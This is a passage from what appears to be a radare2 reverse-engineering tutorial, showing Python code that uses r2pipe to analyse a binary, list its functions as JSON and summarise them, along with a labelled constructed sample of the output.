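    """Open `path` with r2pipe, run 'aaa', fetch 'aflj' and summarize it.
    `r2_open` lets a caller inject an r2pipe-compatible opener (for tests);
    by default r2pipe.open is used. Returns None if r2pipe is not installed."""
    if r2_open is None:
        try:
            import r2pipe
        except ImportError:
            return None
        r2_open = r2pipe.open
    r2 = r2_open(path)
    r2.cmd("aaa")                # .cmd returns the command's output as a string
    functions = r2.cmdj("aflj")  # .cmdj parses the JSON variant into Python objects
    r2.quit()
    return summarize_functions(functions)


# Constructed sample of what aflj returns; not captured from a real binary.
SAMPLE_AFLJ = json.loads("""[
  {"offset": 4198400, "name": "entry0",          "size": 43,  "nbbs": 1},
  {"offset": 4198656, "name": "main",            "size": 312, "nbbs": 14},
  {"offset": 4199168, "name": "sym.parse_input", "size": 120, "nbbs": 6}
]""")


if __name__ == "__main__":
    for row in summarize_functions(SAMPLE_AFLJ):
        print("%-20s %s %5d bytes %3d blocks" %
              (row["name"], row["addr"], row["size"], row["blocks"]))
    live = analyze_binary("/bin/ls")
    print("live r2pipe result:", "unavailable" if live is None else len(live))
```

Prefer the j-suffixed commands over parsing the text output: the text layout of afl changes between r2 releases, while the JSON keys are far more stable, and a script that deserializes once can be reused from any of the r2pipe languages listed above.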

Link: http://feedproxy.google.com/~r/PentestTools/~3/d_ECVYw56ug/radare2-unix-like-reverse-engineering.html